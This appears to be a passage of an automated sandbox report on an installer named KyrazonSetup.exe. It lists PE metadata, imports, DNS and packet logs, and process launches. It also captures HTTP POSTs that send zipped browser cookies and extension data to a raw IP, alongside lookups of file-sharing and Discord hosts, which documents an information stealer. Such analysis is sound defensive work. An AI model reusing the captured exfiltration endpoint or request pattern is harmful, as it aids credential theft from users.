                                                                                    Programming Language:
                                                                                    • [EXP] VC++ 6.0 SP5 build 8804

| Name | Virtual Address | Virtual Size | Is in Section |
| --- | --- | --- | --- |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x853c | 0xa0 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xe5000 | 0x9bc0 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x298 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| .text | 0x1000 | 0x628f | 0x6400 | 547c212779a9000b5c1f9c5c5e58bb70 | False | 0.6705859375 | data | 6.431188612581397 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x8000 | 0x135c | 0x1400 | b27ba0846d4bbf5bff764f5a5c418a97 | False | 0.4611328125 | data | 5.240043476337556 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0xa000 | 0x48518 | 0x600 | aa19af09b29590d8b5ccead2c77eb317 | False | 0.4537760416666667 | data | 4.044766712062166 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .ndata | 0x53000 | 0x92000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0xe5000 | 0x9bc0 | 0x9c00 | 4e0ddf2bb9608e024e5129c4f8b69cb6 | False | 0.9537760416666666 | data | 7.829966589485731 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
| --- | --- | --- | --- | --- | --- | --- |
| RT_ICON | 0xe51d8 | 0x8f8d | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9947209447876133 |
| RT_DIALOG | 0xee168 | 0x202 | data | English | United States | 0.4085603112840467 |
| RT_DIALOG | 0xee370 | 0xf8 | data | English | United States | 0.6290322580645161 |
| RT_DIALOG | 0xee468 | 0xee | data | English | United States | 0.6260504201680672 |
| RT_GROUP_ICON | 0xee558 | 0x14 | data | English | United States | 1.05 |
| RT_VERSION | 0xee570 | 0x228 | data | English | United States | 0.4945652173913043 |
| RT_MANIFEST | 0xee798 | 0x423 | XML 1.0 document, ASCII text, with very long lines (1059), with no line terminators | English | United States | 0.5127478753541076 |

| DLL | Import |
| --- | --- |
| KERNEL32.dll | GetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetCurrentDirectoryA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileAttributesA, GetFileAttributesA, GetShortPathNameA, MoveFileA, GetFullPathNameA, SetFileTime, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA |
| USER32.dll | ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA |
| GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor |
| SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA |
| ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA |
| COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy |
| ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance |
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                    Aug 6, 2024 23:55:45.850905895 CEST44349551162.159.135.232192.168.2.4
                                                                                    Aug 6, 2024 23:55:45.851288080 CEST49551443192.168.2.4162.159.135.232
                                                                                    Aug 6, 2024 23:55:45.852600098 CEST49551443192.168.2.4162.159.135.232
                                                                                    Aug 6, 2024 23:55:45.852632046 CEST44349551162.159.135.232192.168.2.4
                                                                                    Aug 6, 2024 23:55:45.852775097 CEST44349551162.159.135.232192.168.2.4
                                                                                    Aug 6, 2024 23:55:45.852888107 CEST49551443192.168.2.4162.159.135.232
                                                                                    Aug 6, 2024 23:55:45.852888107 CEST49551443192.168.2.4162.159.135.232
                                                                                    Aug 6, 2024 23:55:45.859069109 CEST49552443192.168.2.4162.159.135.232
                                                                                    Aug 6, 2024 23:55:45.859114885 CEST44349552162.159.135.232192.168.2.4
                                                                                    Aug 6, 2024 23:55:45.859472990 CEST49552443192.168.2.4162.159.135.232
                                                                                    Aug 6, 2024 23:55:45.859472990 CEST49552443192.168.2.4162.159.135.232
                                                                                    Aug 6, 2024 23:55:45.859518051 CEST44349552162.159.135.232192.168.2.4
                                                                                    Aug 6, 2024 23:55:46.337018013 CEST44349552162.159.135.232192.168.2.4
                                                                                    Aug 6, 2024 23:55:46.341561079 CEST49552443192.168.2.4162.159.135.232
                                                                                    Aug 6, 2024 23:55:46.341594934 CEST44349552162.159.135.232192.168.2.4
                                                                                    Aug 6, 2024 23:55:46.345105886 CEST44349552162.159.135.232192.168.2.4
                                                                                    Aug 6, 2024 23:55:46.345323086 CEST49552443192.168.2.4162.159.135.232
                                                                                    Aug 6, 2024 23:55:46.346602917 CEST49552443192.168.2.4162.159.135.232
                                                                                    Aug 6, 2024 23:55:46.346672058 CEST44349552162.159.135.232192.168.2.4
                                                                                    Aug 6, 2024 23:55:46.346985102 CEST44349552162.159.135.232192.168.2.4
                                                                                    Aug 6, 2024 23:55:46.347057104 CEST49552443192.168.2.4162.159.135.232
                                                                                    Aug 6, 2024 23:55:46.347057104 CEST49552443192.168.2.4162.159.135.232
                                                                                    Aug 6, 2024 23:55:46.363543987 CEST49537443192.168.2.4162.159.61.3
                                                                                    Aug 6, 2024 23:55:46.363564014 CEST44349537162.159.61.3192.168.2.4
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Aug 6, 2024 23:54:23.176702023 CEST53498841.1.1.1192.168.2.4
                                                                                    Aug 6, 2024 23:54:43.810745955 CEST5288653192.168.2.41.1.1.1
                                                                                    Aug 6, 2024 23:54:43.812508106 CEST5896853192.168.2.41.1.1.1
                                                                                    Aug 6, 2024 23:54:43.820267916 CEST53528861.1.1.1192.168.2.4
                                                                                    Aug 6, 2024 23:54:43.821412086 CEST53589681.1.1.1192.168.2.4
                                                                                    Aug 6, 2024 23:54:43.823806047 CEST59553443192.168.2.4172.64.41.3
                                                                                    Aug 6, 2024 23:54:44.186652899 CEST59553443192.168.2.4172.64.41.3
                                                                                    Aug 6, 2024 23:54:44.326493025 CEST44359553172.64.41.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:44.326527119 CEST44359553172.64.41.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:44.329286098 CEST59553443192.168.2.4172.64.41.3
                                                                                    Aug 6, 2024 23:54:44.330167055 CEST44359553172.64.41.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:44.330508947 CEST44359553172.64.41.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:44.330799103 CEST59553443192.168.2.4172.64.41.3
                                                                                    Aug 6, 2024 23:54:44.334898949 CEST59553443192.168.2.4172.64.41.3
                                                                                    Aug 6, 2024 23:54:44.335103989 CEST59553443192.168.2.4172.64.41.3
                                                                                    Aug 6, 2024 23:54:44.335937977 CEST59553443192.168.2.4172.64.41.3
                                                                                    Aug 6, 2024 23:54:44.436974049 CEST44359553172.64.41.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:44.436999083 CEST44359553172.64.41.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:44.437011957 CEST44359553172.64.41.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:44.437041998 CEST44359553172.64.41.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:44.437618971 CEST59553443192.168.2.4172.64.41.3
                                                                                    Aug 6, 2024 23:54:44.437870026 CEST59553443192.168.2.4172.64.41.3
                                                                                    Aug 6, 2024 23:54:44.446019888 CEST44359553172.64.41.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:44.446037054 CEST44359553172.64.41.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:44.485536098 CEST59553443192.168.2.4172.64.41.3
                                                                                    Aug 6, 2024 23:54:44.538856983 CEST44359553172.64.41.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:44.588339090 CEST59553443192.168.2.4172.64.41.3
                                                                                    Aug 6, 2024 23:54:50.551229954 CEST6302153192.168.2.41.1.1.1
                                                                                    Aug 6, 2024 23:54:50.551552057 CEST6431753192.168.2.41.1.1.1
                                                                                    Aug 6, 2024 23:54:50.558705091 CEST53643171.1.1.1192.168.2.4
                                                                                    Aug 6, 2024 23:54:50.558928967 CEST53630211.1.1.1192.168.2.4
                                                                                    Aug 6, 2024 23:54:50.576237917 CEST60931443192.168.2.4162.159.61.3
                                                                                    Aug 6, 2024 23:54:50.887737036 CEST60931443192.168.2.4162.159.61.3
                                                                                    Aug 6, 2024 23:54:51.070955038 CEST44360931162.159.61.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:51.071502924 CEST44360931162.159.61.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:51.071520090 CEST44360931162.159.61.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:51.073236942 CEST44360931162.159.61.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:51.073252916 CEST44360931162.159.61.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:51.076493025 CEST60931443192.168.2.4162.159.61.3
                                                                                    Aug 6, 2024 23:54:51.076853037 CEST60931443192.168.2.4162.159.61.3
                                                                                    Aug 6, 2024 23:54:51.078661919 CEST60931443192.168.2.4162.159.61.3
                                                                                    Aug 6, 2024 23:54:51.079062939 CEST60931443192.168.2.4162.159.61.3
                                                                                    Aug 6, 2024 23:54:51.079207897 CEST60931443192.168.2.4162.159.61.3
                                                                                    Aug 6, 2024 23:54:51.079811096 CEST60931443192.168.2.4162.159.61.3
                                                                                    Aug 6, 2024 23:54:51.176996946 CEST44360931162.159.61.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:51.177231073 CEST44360931162.159.61.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:51.177243948 CEST44360931162.159.61.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:51.177256107 CEST44360931162.159.61.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:51.178177118 CEST60931443192.168.2.4162.159.61.3
                                                                                    Aug 6, 2024 23:54:51.178297997 CEST60931443192.168.2.4162.159.61.3
                                                                                    Aug 6, 2024 23:54:51.178803921 CEST44360931162.159.61.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:51.180684090 CEST44360931162.159.61.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:51.213709116 CEST60931443192.168.2.4162.159.61.3
                                                                                    Aug 6, 2024 23:54:51.280910969 CEST44360931162.159.61.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:51.323141098 CEST60931443192.168.2.4162.159.61.3
                                                                                    Aug 6, 2024 23:55:39.294351101 CEST5374453192.168.2.41.1.1.1
                                                                                    Aug 6, 2024 23:55:39.316992044 CEST53537441.1.1.1192.168.2.4
                                                                                    Aug 6, 2024 23:55:40.325319052 CEST6043953192.168.2.41.1.1.1
                                                                                    Aug 6, 2024 23:55:40.347546101 CEST53604391.1.1.1192.168.2.4
                                                                                    Aug 6, 2024 23:55:41.044708014 CEST5548453192.168.2.41.1.1.1
                                                                                    Aug 6, 2024 23:55:41.057162046 CEST53554841.1.1.1192.168.2.4
                                                                                    Aug 6, 2024 23:55:41.789307117 CEST5001553192.168.2.41.1.1.1
                                                                                    Aug 6, 2024 23:55:41.808865070 CEST53500151.1.1.1192.168.2.4
                                                                                    Aug 6, 2024 23:55:42.404290915 CEST5053753192.168.2.41.1.1.1
                                                                                    Aug 6, 2024 23:55:42.442481995 CEST53505371.1.1.1192.168.2.4
                                                                                    Aug 6, 2024 23:55:42.448359013 CEST6381953192.168.2.41.1.1.1
                                                                                    Aug 6, 2024 23:55:42.466259956 CEST53638191.1.1.1192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Aug 6, 2024 23:54:43.810745955 CEST | 192.168.2.4 | 1.1.1.1 | 0xe816 | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false
Aug 6, 2024 23:54:43.812508106 CEST | 192.168.2.4 | 1.1.1.1 | 0x52f1 | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false
Aug 6, 2024 23:54:50.551229954 CEST | 192.168.2.4 | 1.1.1.1 | 0x6ba2 | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false
Aug 6, 2024 23:54:50.551552057 CEST | 192.168.2.4 | 1.1.1.1 | 0xf7e0 | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false
Aug 6, 2024 23:55:39.294351101 CEST | 192.168.2.4 | 1.1.1.1 | 0xce42 | Standard query (0) | oshi.at | A (IP address) | IN (0x0001) | false
Aug 6, 2024 23:55:40.325319052 CEST | 192.168.2.4 | 1.1.1.1 | 0x5aa | Standard query (0) | tempfile.me | A (IP address) | IN (0x0001) | false
Aug 6, 2024 23:55:41.044708014 CEST | 192.168.2.4 | 1.1.1.1 | 0x2e9c | Standard query (0) | api.gofile.io | A (IP address) | IN (0x0001) | false
Aug 6, 2024 23:55:41.789307117 CEST | 192.168.2.4 | 1.1.1.1 | 0x2dd2 | Standard query (0) | file.io | A (IP address) | IN (0x0001) | false
Aug 6, 2024 23:55:42.404290915 CEST | 192.168.2.4 | 1.1.1.1 | 0xdfc6 | Standard query (0) | zerostone.discloud.app | A (IP address) | IN (0x0001) | false
Aug 6, 2024 23:55:42.448359013 CEST | 192.168.2.4 | 1.1.1.1 | 0x102d | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Aug 6, 2024 23:54:43.820267916 CEST | 1.1.1.1 | 192.168.2.4 | 0xe816 | No error (0) | chrome.cloudflare-dns.com |  | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Aug 6, 2024 23:54:43.820267916 CEST | 1.1.1.1 | 192.168.2.4 | 0xe816 | No error (0) | chrome.cloudflare-dns.com |  | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Aug 6, 2024 23:54:43.821412086 CEST | 1.1.1.1 | 192.168.2.4 | 0x52f1 | No error (0) | chrome.cloudflare-dns.com |  |  | 65 | IN (0x0001) | false
Aug 6, 2024 23:54:50.558705091 CEST | 1.1.1.1 | 192.168.2.4 | 0xf7e0 | No error (0) | chrome.cloudflare-dns.com |  |  | 65 | IN (0x0001) | false
Aug 6, 2024 23:54:50.558928967 CEST | 1.1.1.1 | 192.168.2.4 | 0x6ba2 | No error (0) | chrome.cloudflare-dns.com |  | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Aug 6, 2024 23:54:50.558928967 CEST | 1.1.1.1 | 192.168.2.4 | 0x6ba2 | No error (0) | chrome.cloudflare-dns.com |  | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Aug 6, 2024 23:55:39.316992044 CEST | 1.1.1.1 | 192.168.2.4 | 0xce42 | No error (0) | oshi.at |  | 194.15.112.248 | A (IP address) | IN (0x0001) | false
Aug 6, 2024 23:55:39.316992044 CEST | 1.1.1.1 | 192.168.2.4 | 0xce42 | No error (0) | oshi.at |  | 5.253.86.15 | A (IP address) | IN (0x0001) | false
Aug 6, 2024 23:55:39.316992044 CEST | 1.1.1.1 | 192.168.2.4 | 0xce42 | No error (0) | oshi.at |  | 188.241.120.6 | A (IP address) | IN (0x0001) | false
Aug 6, 2024 23:55:40.347546101 CEST | 1.1.1.1 | 192.168.2.4 | 0x5aa | No error (0) | tempfile.me |  | 193.37.215.73 | A (IP address) | IN (0x0001) | false
Aug 6, 2024 23:55:40.347546101 CEST | 1.1.1.1 | 192.168.2.4 | 0x5aa | No error (0) | tempfile.me |  | 212.111.80.158 | A (IP address) | IN (0x0001) | false
Aug 6, 2024 23:55:41.057162046 CEST | 1.1.1.1 | 192.168.2.4 | 0x2e9c | No error (0) | api.gofile.io |  | 51.38.43.18 | A (IP address) | IN (0x0001) | false
Aug 6, 2024 23:55:41.057162046 CEST | 1.1.1.1 | 192.168.2.4 | 0x2e9c | No error (0) | api.gofile.io |  | 45.112.123.126 | A (IP address) | IN (0x0001) | false
Aug 6, 2024 23:55:41.808865070 CEST | 1.1.1.1 | 192.168.2.4 | 0x2dd2 | No error (0) | file.io |  | 45.55.107.24 | A (IP address) | IN (0x0001) | false
Aug 6, 2024 23:55:42.466259956 CEST | 1.1.1.1 | 192.168.2.4 | 0x102d | No error (0) | discord.com |  | 162.159.135.232 | A (IP address) | IN (0x0001) | false
Aug 6, 2024 23:55:42.466259956 CEST | 1.1.1.1 | 192.168.2.4 | 0x102d | No error (0) | discord.com |  | 162.159.138.232 | A (IP address) | IN (0x0001) | false
Aug 6, 2024 23:55:42.466259956 CEST | 1.1.1.1 | 192.168.2.4 | 0x102d | No error (0) | discord.com |  | 162.159.128.233 | A (IP address) | IN (0x0001) | false
Aug 6, 2024 23:55:42.466259956 CEST | 1.1.1.1 | 192.168.2.4 | 0x102d | No error (0) | discord.com |  | 162.159.137.232 | A (IP address) | IN (0x0001) | false
Aug 6, 2024 23:55:42.466259956 CEST | 1.1.1.1 | 192.168.2.4 | 0x102d | No error (0) | discord.com |  | 162.159.136.232 | A (IP address) | IN (0x0001) | false
                                                                                    • 92.246.138.20
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49539 | 92.246.138.20 | 80 | 4504 | C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
Timestamp | Bytes transferred | Direction | Data
Aug 6, 2024 23:55:38.566287994 CEST | 483 | OUT | POST /storage HTTP/1.1
                                                                                    Accept: application/json, text/plain, */*
                                                                                    Content-Type: multipart/form-data; boundary=--------------------------229700368627596606758153
                                                                                    User-Agent: axios/1.7.2
                                                                                    Content-Length: 2931
                                                                                    Accept-Encoding: gzip, compress, deflate, br
                                                                                    Host: 92.246.138.20
                                                                                    Connection: close
                                                                                    Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 32 39 37 30 30 33 36 38 36 32 37 35 39 36 36 30 36 37 35 38 31 35 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 38 33 33 33 64 34 38 31 2d 34 61 65 34 2d 34 66 32 63 2d 62 63 62 39 2d 37 61 62 66 32 32 31 66 31 31 31 63 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 0d 0a
                                                                                    Data Ascii: ----------------------------229700368627596606758153Content-Disposition: form-data; name="file"; filename="8333d481-4ae4-4f2c-bcb9-7abf221f111c.zip"Content-Type: application/zip
Aug 6, 2024 23:55:38.566287994 CEST | 2746 | OUT | Data Raw: 50 4b 03 04 14 00 00 08 00 00 ce 8e 06 59 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 00 00 41 70 70 6c 69 63 61 74 69 6f 6e 73 5c 50 4b 03 04 14 00 00 08 00 00 ce 8e 06 59 00 00 00 00 00 00 00 00 00 00 00 00 13 00 00 00 42 72 6f 77 73 65 72 20 45
                                                                                    Data Ascii: PKYApplications\PKYBrowser Extensions\PKYCookies\PKYq-Cookies\Google_Default.txtH9*2!Y|'6Z}Z3bX
Aug 6, 2024 23:55:39.209877968 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                    X-Powered-By: Express
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Content-Length: 2
                                                                                    ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                                                    Date: Tue, 06 Aug 2024 21:55:39 GMT
                                                                                    Connection: close
                                                                                    Data Raw: 4f 4b
                                                                                    Data Ascii: OK


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49543 | 92.246.138.20 | 80 | 7896 | C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
Timestamp | Bytes transferred | Direction | Data
Aug 6, 2024 23:55:41.888885975 CEST | 483 | OUT | POST /storage HTTP/1.1
                                                                                    Accept: application/json, text/plain, */*
                                                                                    Content-Type: multipart/form-data; boundary=--------------------------784166671983596314677254
                                                                                    User-Agent: axios/1.7.2
                                                                                    Content-Length: 2931
                                                                                    Accept-Encoding: gzip, compress, deflate, br
                                                                                    Host: 92.246.138.20
                                                                                    Connection: close
                                                                                    Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 37 38 34 31 36 36 36 37 31 39 38 33 35 39 36 33 31 34 36 37 37 32 35 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 62 31 39 39 65 66 37 66 2d 34 34 64 34 2d 34 34 35 30 2d 39 31 62 65 2d 63 66 62 35 35 33 30 33 31 66 61 33 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 0d 0a
                                                                                    Data Ascii: ----------------------------784166671983596314677254Content-Disposition: form-data; name="file"; filename="b199ef7f-44d4-4450-91be-cfb553031fa3.zip"Content-Type: application/zip
Aug 6, 2024 23:55:41.890173912 CEST | 2688 | OUT | Data Raw: 50 4b 03 04 14 00 00 08 00 00 d6 8e 06 59 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 00 00 41 70 70 6c 69 63 61 74 69 6f 6e 73 5c 50 4b 03 04 14 00 00 08 00 00 d6 8e 06 59 00 00 00 00 00 00 00 00 00 00 00 00 13 00 00 00 42 72 6f 77 73 65 72 20 45
                                                                                    Data Ascii: PKYApplications\PKYBrowser Extensions\PKYCookies\PKYq-Cookies\Google_Default.txtH9*2!Y|'6Z}Z3bX
Aug 6, 2024 23:55:41.890965939 CEST | 58 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 37 38 34 31 36 36 36 37 31 39 38 33 35 39 36 33 31 34 36 37 37 32 35 34 2d 2d 0d 0a
                                                                                    Data Ascii: ----------------------------784166671983596314677254--
Aug 6, 2024 23:55:42.451284885 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                    X-Powered-By: Express
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Content-Length: 2
                                                                                    ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                                                    Date: Tue, 06 Aug 2024 21:55:42 GMT
                                                                                    Connection: close
                                                                                    Data Raw: 4f 4b
                                                                                    Data Ascii: OK


                                                                                    Target ID:0
                                                                                    Start time:17:53:59
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\KyrazonSetup.exe"
                                                                                    Imagebase:0x400000
                                                                                    File size:80'239'576 bytes
                                                                                    MD5 hash:7A84BBEADE50E7110FE8D278DC22B92D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:1
                                                                                    Start time:17:54:00
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\system32\cmd.exe" /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq KyrazonGodot.exe" /FO csv | "C:\Windows\system32\find.exe" "KyrazonGodot.exe"
                                                                                    Imagebase:0x240000
                                                                                    File size:236'544 bytes
                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:2
                                                                                    Start time:17:54:00
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:3
                                                                                    Start time:17:54:00
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq KyrazonGodot.exe" /FO csv
                                                                                    Imagebase:0xd50000
                                                                                    File size:79'360 bytes
                                                                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    Target ID:4
                                                                                    Start time:17:54:00
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\SysWOW64\find.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\system32\find.exe" "KyrazonGodot.exe"
                                                                                    Imagebase:0x5c0000
                                                                                    File size:14'848 bytes
